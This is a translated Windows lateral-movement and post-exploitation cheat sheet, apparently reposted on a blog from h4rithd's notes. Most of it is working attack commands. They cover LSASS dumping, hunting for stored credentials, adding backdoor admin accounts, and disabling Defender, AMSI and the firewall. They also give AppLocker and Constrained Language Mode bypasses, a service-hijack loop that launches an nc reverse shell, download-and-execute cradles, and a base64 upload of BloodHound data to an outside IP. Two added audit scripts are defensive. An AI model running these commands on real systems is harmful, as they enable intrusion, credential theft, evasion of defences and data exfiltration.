Windows Common Commands - Lateral Movement - h4rithd - 2024.04.03 edition

Notes on this cheat sheet:

This cheat sheet was recorded on GitBook by h4rithd, an offensive-security enthusiast from abroad. I translated the comments in full and, based on my own practice-range learning, added or removed some content. I am keeping it on my blog for my own later review and as a reference for any security enthusiasts who come across it.

Lateral Movement

01. Common Commands

01.1 OS Enumeration

## ------------------| Get basic details
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
whoami /all
[System.Environment]::OSVersion.Version
Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayerVersion
(Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion").ReleaseId

## ------------------| Get environment variables
##[PowerShell]
Get-ChildItem Env: | ft Key,Value
dir env:

## ------------------| Get .NET version (cmd/ps)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

## ------------------| Get system architecture, 32 or 64 bit
##[PowerShell]
$env:PROCESSOR_ARCHITECTURE
[Environment]::Is64BitProcess
[Environment]::Is64BitOperatingSystem
##[cmd]
set processor

## ------------------| Extract OS patches and updates
wmic qfe

## ------------------| List all installed software with version and vendor
wmic product get name, version, vendor

## ------------------| List all disks
mountvol
wmic logicaldisk get caption,description,providername

## ------------------| List firewall status and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all

01.2 User Enumeration

## ------------------| Get current username
echo %USERNAME% || whoami
$env:username

## ------------------| List user info
net user <UserName>

## ------------------| Get the user profile (home) directory
write-host $env:USERPROFILE

## ------------------| List user privileges
whoami /priv
whoami /groups

## ------------------| List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name

## ------------------| List logon requirements (password policy)
net accounts

## ------------------| List all local groups
net localgroup
Get-LocalGroup | ft Name

## ------------------| Get details about a group
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

## ------------------| Get domain controllers
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName

## ------------------| Get Domain Users
net view /domain
net view /domain:DomainName
  • Create a user
## ------------------| Local account
## Create a local user
net user /add harith Password@123
## Add to the admin group
net localgroup administrators harith /add
## Add to the Remote Desktop Users group
net localgroup "Remote Desktop Users" harith /add

## ------------------| Domain account
## This command can only be used on a Windows domain controller
net user h4rithd Passw0rD$ /add /domain

# Check the members of a group
net group "Exchange Windows Permissions"

# Add a member to a group (the user name comes before /add)
net group "Exchange Windows Permissions" h4rithd /add
  • Log in as another user
## ------------------| If you have RDP
runas /user:h4rithd cmd.exe
powershell.exe Start-Process cmd.exe -Credential h4rithd

## ------------------| Create a credential object
$env:ComputerName
$user = "ComputerName\USERNAME" # best used as $user = "<hostname>\<username>"
$pass = "PASSWORD"
$secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential($user,$secStringPass)
## OR -----------------------------------------------------------------------------------------------------
$pass = ConvertTo-SecureString -AsPlainText -Force -String "PASSWORD"
$Creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "ComputerName\USERNAME",$pass

## ------------------| Use the credential object for actions
### Get the hostname with the hostname command
Invoke-Command -Credential $Creds -ComputerName <IP/LOCALHOST or Hostname> -ScriptBlock { whoami }
Enter-PSSession -Credential $Creds -ComputerName <IP/LOCALHOST or Hostname>
Start-Process -Credential $Creds -FilePath Powershell -ArgumentList "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.22/rev.ps1')"

## Double-hop access (CredSSP authentication)
Invoke-Command -ComputerName helpline -Authentication CredSSP -Credential $Creds -ScriptBlock { whoami }
  • Change password
$pass = ConvertTo-SecureString 'Pas$word!' -AsPlainText -Force
# Set-DomainUserPassword is a PowerView function
Set-DomainUserPassword Herman -AccountPassword $pass -Verbose
  • Stored credentials | saved creds
cmdkey /list
runas /savecred /user:<USERNAME> C:\<PATH>\shell.exe

01.3 Network Enumeration

## ------------------| List all listening ports
netstat -ano | findstr /i listen
netstat -anop tcp

## ------------------| List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

## ------------------| List the current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

## ------------------| List the ARP table
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

## ------------------| List all network shares
net share
# Find-DomainShare is a PowerView function
powershell Find-DomainShare -ComputerDomain domain.local

## ------------------| SNMP configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
  • Enable RDP
## ------------------| Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

## ------------------| Enable authentication (NLA) for RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1

## ------------------| Allow RDP through Windows Firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

## ------------------| Using MSF
use post/windows/manage/enable_rdp
set Username h4rithd
set Password Password123!
set SESSION 1
info
run

## ------------------| Login to the RDP
rdesktop -g 1920x1080 <IP>
  • Ping sweep
## ------------------| General
1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_} | Select-String ttl

## ------------------| Parallel ping sweeper
workflow ParallelSweep { foreach -parallel -throttlelimit 4 ($i in 1..255) {ping -n 1 -w 100 10.0.0.$i}}; ParallelSweep | Select-String ttl

## ------------------| Multi-subnet ping sweeper with OS detection
## TTL is the last "=" field of the reply line ("... time<1ms TTL=128"), so index [-1] works for both "time<1ms" and "time=12ms"
0..10 | % { $a = $_; 1..255 | % { $b = $_; ping -n 1 -w 10 "10.0.$a.$b" | select-string TTL | % { if ($_ -match "ms") { $ttl = $_.line.split('=')[-1] -as [int]; if ($ttl -lt 65) { $os = "Linux" } ElseIf ($ttl -gt 64 -And $ttl -lt 129) { $os = "Windows" } else { $os = "Cisco"}; write-host "10.0.$a.$b OS: $os"; echo "10.0.$a.$b" >> scan_results.txt }}} }
  • Export a DNS zone
Get-DNSServerZone
Export-DnsServerZone -Name localnet.domain -FileName dns-export.txt
## The file is exported to C:\Windows\system32\dns\dns-export.txt

## ------------------| Inveigh
wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/Inveigh.ps1')
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y

01.4 Process/Service Enumeration

## ------------------| List processes
Get-Process -name firefox
tasklist /v | findstr smss
ps | findstr smss

## ------------------| List all services
Get-Service
sc query state=all
get-wmiobject win32_service
## If all of the above commands fail, try the following
Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'
Get-ChildItem . | select name
Get-ChildItem . | where-object { $_.Name -like '*EnterServiceNameHere*' }

## ------------------| Processes running as "system"
tasklist /v /fi "username eq system"

## ------------------| Kill a process
taskkill /f /im filename.exe

## ------------------| Scheduled tasks
### List all tasks
schtasks /query /fo LIST /v
### Run a task
schtasks /RUN /TN "\NameHere"

## ------------------| Start a service (Stop, Restart)
## Get the display name with the methods above
Stop-Service "Ubiquiti UniFi Video"
Start-Service "Ubiquiti UniFi Video"
net stop EnterServiceNameHere
net start EnterServiceNameHere
sc.exe stop EnterServiceNameHere
sc.exe start EnterServiceNameHere

## ------------------| Check basic service properties
Get-Service nscp | fl *

## ------------------| List loaded assemblies
[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname

## ------------------| List only running services
Get-Service | where {$_.Status -eq "Running"}

## ------------------| Auto-start services with unquoted paths outside C:\Windows
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
  • Modifiable services
## ------------------| Modify the UsoSvc service binary path
sc.exe config UsoSvc binpath="cmd.exe /c powershell -EncodedCommand SQBFAFgAKABOA.....ApAA=="

## ------------------| Restart the UsoSvc service
sc.exe stop UsoSvc
sc.exe start UsoSvc
  • Dump a process
## ------------------| Dump a process with rundll32
get-process
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> <PATH-TO-SAVE-FILE> full
## Dumping LSASS without Mimikatz
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\Documents\lsass.dmp

## ------------------| Dump a process with ProcDump
./procdump.exe -accepteula -ma <PID>
  • List installed programs
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

01.5 Registry Enumeration

  • Service registry enumeration
## ------------------| Check whether the user has FullControl
accesschk.exe "<USER>" -kwsu HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
## or -----------------------------------------------------------
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services; ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}

## ------------------| Find a service that I can restart
$cmd = "C:\inetpub\wwwroot\uploads\nc.exe 10.10.14.187 444 -e powershell.exe"
# Build the list of services
$otp = ./accesschk.exe "Hector" -kvuqsv hklm:\System\CurrentControlSet\Services
$services = $otp.Split([Environment]::NewLine)
# Loop through each service
foreach($service in $services) {
    # If the current line is not a service, skip it
    if(!$service.StartsWith("RW HKLM")) {
        continue
    }
    # Verify that the line really is a service
    $name = $service.Split("\\")[-1].Split([Environment]::NewLine)[0]
    $s = Get-Service -Name $name -ErrorAction SilentlyContinue
    if(!$s) {
        continue
    }
    echo $service
    $serv = $service.Split(" ")[-1].Split([Environment]::NewLine)[0]
    echo $serv
    # Try to exploit the service:
    # 1. change the service's binary path to $cmd
    # 2. restart the service
    if($s.Status -eq 'Running') {
        reg add $serv /v ImagePath /t REG_EXPAND_SZ /d "$cmd" /f >a.txt
        if((Get-Service -Name $name).Status -eq 'Running') {
            Get-Service -Name $name | Stop-Service -ErrorAction SilentlyContinue
            Write-Host "[STOP] "$name
        }
    } elseif ($s.Status -eq 'Stopped') {
        reg add $serv /v ImagePath /t REG_EXPAND_SZ /d "$cmd" /f >a.txt
        if((Get-Service -Name $name).Status -eq 'Stopped') {
            Get-Service -Name $name | Start-Service -ErrorAction SilentlyContinue
            Write-Host "[START] "$name
        }
    }
}
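A defender-side counterpart to the loop above, added here as an example and not part of h4rithd's notes: instead of rewriting ImagePath, it audits every key under HKLM:\SYSTEM\CurrentControlSet\Services and reports any ACE that grants write rights to Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE, which is the condition the accesschk -kvuqsv output exposes. The function name and the identity list are my own choices.

```powershell
# Added example, not from the original cheat sheet. Read-only: it changes nothing.
# Lists service registry keys that low-privileged principals can modify (the
# precondition for the ImagePath-rewrite attack shown above).
function Find-WritableServiceKeys {
    param(
        # Principals that should never be able to modify a service definition (assumed list).
        [string[]]$LowPrivIdentities = @(
            'Everyone',
            'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE'
        )
    )
    # Any of these rights lets a caller change ImagePath or add a subkey (e.g. Parameters).
    $writeMask = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, ChangePermissions, TakeOwnership, FullControl'

    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }   # skip keys whose ACL we cannot read
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
            # -band also works when the ACE carries generic rights (shown as negative numbers)
            if (($ace.RegistryRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

# Anything returned here is a local privilege-escalation path and needs its ACL fixed.
Find-WritableServiceKeys | Format-Table -AutoSize
```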

01.6 File Enumeration

## ------------------| List all files, including hidden files
dir -force
dir /b /s C:\flag.txt
where /R C:\ flag.txt
gci -r . user.txt
gci -recurse | select FullName
gci -recurse C:\Users\ user.txt
Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname

## ------------------| Get file stream data (alternate data streams)
cmd /c dir /r
Get-Item <FileName> -Stream *
Get-Content <FileName> -Stream <StreamName>

## ------------------| List all files that have an extension
gci -recurse -include *.* | select FullName

## ------------------| Replace certain words (sed); sc is the Set-Content alias
((cat ..\path\to\file.txt -Raw) -replace 'foo', 'bar') | sc -path ..\path\to\new\file.txt

## ------------------| List all installed drivers/versions
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
  • Advanced search
## ------------------| Search file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

## ------------------| Search for files with a specific filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

## ------------------| Search for strings inside files
IWR -Uri "https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1" -OutFile "Find-Strings.ps1"
.\Find-Strings.ps1 -stopAt "5"
.\Find-strings.ps1 -Path "$Env:TMP" -String "pass=|passwd=|password="
.\Find-strings.ps1 -Path "$Env:USERPROFILE" -String "[^$]password="

## ------------------| Find GPP passwords in SYSVOL
dir "C:\ProgramData\Microsoft\Group Policy\History\"
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

## ------------------| Search for Windows autologon credentials
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword /reg:64
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | findstr "DefaultUserName DefaultDomainName DefaultPassword"
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

## ------------------| Search the registry for key names containing "password"
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

## ------------------| Search SNMP parameters
REG QUERY "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

## ------------------| Search for PuTTY cleartext proxy credentials
REG QUERY "HKCU\Software\SimonTatham\PuTTY\Sessions"

## ------------------| Search for VNC credentials
REG QUERY "HKCU\Software\ORL\WinVNC3\Password"
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

REG QUERY HKLM /f password /t REG_SZ /s
REG QUERY HKCU /f password /t REG_SZ /s

## ------------------| Search for insecure file permissions (check for "world writable")
### Tool : https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uws "Everyone" "C:\Program Files"

## ------------------| Back up Sticky Notes
### Win 10 new (version 1607)
cd C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
### Win 10/7/8 (version 1511)
cd C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Sticky Notes
## copy all plum.* files; then use sqlite to extract
  • Weak permissions
## ------------------| File\Folder
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"

## ------------------| Service
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "BUILTIN\Users:(I)(F)"
icacls "C:\Program Files\*" 2>nul | findstr "BUILTIN\Users:(I)(F)"
  • Set/check permissions
## ------------------| Check
Get-ACL folder-or-file-name | FL *
Get-ACL root.txt | FL AccessToString

## ------------------| Grant full control
cacls root.txt /t /e /p UserName:F

## ------------------| Remove a user from the ACL
cacls root.txt /e /r UserName

#---------------- cacls command help
# /e Edit the ACL instead of replacing it.
# /t Change the ACLs of the specified files in the current directory and all subdirectories.
# /p user:<perm> Replace the specified user's access rights; valid permission values are:
# |-> n - None
# |-> r - Read
# |-> w - Write
# |-> c - Change (write)
# |-> f - Full control

## ------------------| Search for insecure file permissions (check for "world writable")
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
  • Enumerate shortcuts (.lnk)
$Wscript = New-Object -ComObject Wscript.Shell
# CreateShortcut takes one path at a time, so resolve each .lnk and show where it points
Get-ChildItem *.lnk | ForEach-Object { $Wscript.CreateShortcut($_.FullName) | Select-Object FullName, TargetPath, Arguments, WorkingDirectory }
  • Compress and extract zip files
## ------------------| Compress
Compress-Archive -LiteralPath <PathToFiles> -DestinationPath <PathToDestination>.zip

## ------------------| Extract/unzip
Expand-Archive -LiteralPath <PathToZipFile>.zip -DestinationPath <PathToDestination>

01.7 Firewall/Defender

01.7.1 Firewall

## ------------------| List firewall status and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all

## ------------------| List firewall rules
Get-NetFirewallPortFilter
Get-NetFirewallRule
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow

## ------------------| Add a firewall rule to open port 3306
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<compromised_ip> localport=3306 action=allow

## ------------------| Disable the firewall on Windows 7 via cmd (note: this key actually allows RDP connections and does not touch the firewall)
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

## ------------------| Disable the firewall on Windows 7 via PowerShell (same fDenyTSConnections key as above)
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0'

## ------------------| Disable the firewall on any Windows version via cmd
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off

## ------------------| Enable (psexec) access to ADMIN$, C$, IPC$ (Windows administrative shares)
REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

## ------------------| List ports blocked by the firewall
powershell -c "$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq 0} | select name,applicationname,localports;$f"
powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}}, @{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}}, @{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}}, Enabled, Profile, Direction, Action"

01.7.2 Antivirus and Detection | Disable Defender

## ------------------| Check Defender status
Get-MpComputerStatus

## ------------------| Check the Defender exclusion list
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
Get-MpPreference | Select-Object -Property ExclusionPath | Format-Table -AutoSize

## ------------------| Disable Defender (remove signatures)
cd "C:\Progra~1\Windows Defender"
.\mpcmdrun.exe -RemoveDefinitions -All

## ------------------| Disable scanning of all downloaded files and attachments; disable AMSI (passive)
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true

## ------------------| Disable AMSI (set to 0 to enable)
Set-MpPreference -DisableScriptScanning 1

## ------------------| Exclude a folder, extension or process
Add-MpPreference -ExclusionPath "C:\Windows\Temp" -Force
Add-MpPreference -ExclusionPath "C:\Windows\Tasks" -Force
Add-MpPreference -ExclusionPath "C:\Windows\Temp\h4rithd" -Force
Set-MpPreference -ExclusionProcess "mimikatz.exe", "winPEAS.exe" -Force
Add-MpPreference -ExclusionExtension "exe" -Force

## ------------------| Remove signatures (they are downloaded again if there is an internet connection):
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
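An added audit script (not from the original cheat sheet) that reads back the settings the commands above change: real-time and IOAV protection, script scanning, signature age, exclusions on the user-writable folders listed elsewhere on this page, and recent Defender configuration-change events (event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log). The function name and the suspicious-path list are my assumptions.

```powershell
# Added example, not from the original cheat sheet.
# Reads back the Defender settings the commands above modify and reports what looks tampered.
# Requires the Defender module (Windows 10 / Server 2016 and later); read-only, changes nothing.
function Get-DefenderTamperReport {
    param(
        # Exclusions on these user-writable folders are a classic sign of tampering
        # (same folders as under "Default writable folders" on this page). Assumed list.
        [string[]]$SuspiciousPaths = @('C:\Windows\Temp', 'C:\Windows\Tasks', 'C:\Windows\tracing', 'C:\Users\Public'),
        [int]$EventHours = 24
    )
    $findings = New-Object 'System.Collections.Generic.List[string]'
    $status   = Get-MpComputerStatus
    $pref     = Get-MpPreference

    if (-not $status.AntivirusEnabled)          { $findings.Add('Antivirus engine is disabled') }
    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time protection is OFF (Set-MpPreference -DisableRealtimeMonitoring)') }
    if ($pref.DisableIOAVProtection)            { $findings.Add('Download/attachment (IOAV) scanning is disabled') }
    if ($pref.DisableScriptScanning)            { $findings.Add('Script scanning is disabled') }
    if ($status.AntivirusSignatureAge -gt 7)    { $findings.Add("Signatures are $($status.AntivirusSignatureAge) days old (possible -RemoveDefinitions)") }

    foreach ($p in @($pref.ExclusionPath)) {
        if (-not $p) { continue }
        foreach ($s in $SuspiciousPaths) {
            if ($p -like "$s*") { $findings.Add("Exclusion on user-writable path: $p") }
        }
    }
    foreach ($e in @($pref.ExclusionExtension)) { if ($e) { $findings.Add("Excluded extension: $e") } }
    foreach ($x in @($pref.ExclusionProcess))   { if ($x) { $findings.Add("Excluded process: $x") } }

    # Event 5007 = "Microsoft Defender Antivirus configuration has changed"; every
    # Set-MpPreference / Add-MpPreference call above leaves one of these behind.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddHours(-$EventHours)
    }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($ev in @($events)) {
        if (-not $ev) { continue }
        # The "Old value" / "New value" lines of the message say which setting changed.
        $detail = ($ev.Message -split "`r?`n" | Where-Object { $_ -match 'value' }) -join ' | '
        $findings.Add("Config change at $($ev.TimeCreated): $detail")
    }

    [pscustomobject]@{
        Computer = $env:COMPUTERNAME
        Clean    = ($findings.Count -eq 0)
        Findings = $findings
    }
}

Get-DefenderTamperReport | Format-List
```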

01.8 Default Locations

## ------------------| PowerShell default locations
[x86] C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
[x64] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[x64] C:\windows\sysnative\windowspowershell\v1.0\powershell.exe

## ------------------| Default writable folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public

## ------------------| Passwords in unattend.xml
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

## ------------------| Sticky Notes passwords
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

## ------------------| Powershell History
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
  • Publicly writable directories (for any user)
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\system32\spool\drivers\color
C:\Users\Public
C:\Users\Public\Documents
C:\Windows\tracing
C:\Windows\Tasks
C:\Windows\Temp
C:\programdata

01.9 Policy Bypass

  • PowerShell execution policy bypass
## ------------------| Check/set the execution policy
Set-ExecutionPolicy RemoteSigned # set the policy to RemoteSigned.
Set-ExecutionPolicy Unrestricted # set the policy to Unrestricted.
Get-ExecutionPolicy # verify the current execution policy setting.
Get-ExecutionPolicy -List | Format-Table -AutoSize

## ------------------| How to bypass
## 0) If you have evil-winrm access: copy the rev.ps1 file into the current directory, then
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD> -s $(pwd)
rev.ps1
menu

## 1) Copy and paste the script into an interactive PowerShell console

## 2) Read the script from a file and pipe it to PowerShell's standard input
Get-Content rev.ps1 | PowerShell.exe -noprofile -
type rev.ps1 | PowerShell.exe -noprofile -

## 3) Download the script from a URL and execute it with Invoke-Expression
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://<IP>/rev.ps1')"

## 4) Use the Bypass execution policy flag
PowerShell.exe -ExecutionPolicy Bypass -File .\rev.ps1
  • Bypass AppLocker group policy
## ------------------| Check AppLocker status
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

## ------------------| Bypass | move the file to one of the following paths
C:\Windows\Temp
C:\Windows\Tasks
C:\windows\tracing
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\Registration\CRMLog
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
C:\Windows\System32\Tasks_Migrated # after an in-place Windows 10 version upgrade

## ------------------| Bypass using Invoke-ReflectivePEInjection (PowerSploit)
cp /opt/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 .
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/Invoke-ReflectivePEInjection.ps1')
$PEBytes = [IO.File]::ReadAllBytes('full\path\for\application.exe')
Invoke-ReflectivePEInjection -PEBytes $PEBytes
## Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

## ------------------| More info
https://github.com/api0cradle/UltimateAppLockerByPassList
  • PowerShell Constrained Language Mode bypass
## ------------------| Verify whether Constrained Language Mode is enabled
$ExecutionContext.SessionState.LanguageMode

## ------------------| Method 01
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/rev.ps1')

## ------------------| Method 02
## You can run commands inside a function, e.g. function test { whoami }, which is equivalent to &{ whoami }
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
echo -e "Invoke-PowerShellTcp -Reverse -IPAddress <HostIP> -Port 4545" >> rev.ps1
python3 -m http.server 80
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
&{ powershell -enc JABzAG0...Sad== }

## ------------------| Using PsBypassCLM
wget https://github.com/h4rithd/PrecompiledBinaries/blob/main/PSBypassCLM/PsBypassCLM.exe
### Execute
### Place the binary in C:\Windows\Tasks\PsBypassCLM.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U C:\Windows\Tasks\PsBypassCLM.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.38 /rport=4545 /U C:\Windows\Tasks\PsBypassCLM.exe
  • UAC bypass
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

## Bypassing
https://github.com/hfiref0x/UACME
https://docs.h4rithd.com/windows/privilageesc-windows#01.-common-tricks

01.10 Upload/Download/Execute

  • Upload files
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))     
Invoke-WebRequest -Uri http://10.10.14.25:443 -Method POST -Body $b64

## Download file with netcat
